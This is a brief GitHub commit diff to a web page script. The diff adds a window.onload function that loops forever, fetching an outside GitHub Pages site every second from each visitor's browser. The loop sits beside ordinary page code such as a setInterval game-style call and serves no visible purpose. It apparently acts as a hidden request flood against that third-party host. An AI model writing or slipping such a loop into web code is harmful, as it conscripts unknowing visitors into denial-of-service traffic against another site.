This commit is contained in:
Boof 2023-01-17 09:38:22 +01:00 committed by GitHub
parent fc8a3962ee
commit e07a896949
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -16,9 +16,11 @@
setTimeout(resolve, milliseconds);
});
}
window.onload = async function startdown(){
while(true) {
await delay(1000);
fetch('https://t0m0t0w.github.io')
}
}
let speed = 1000
setInterval(addKrydder, speed);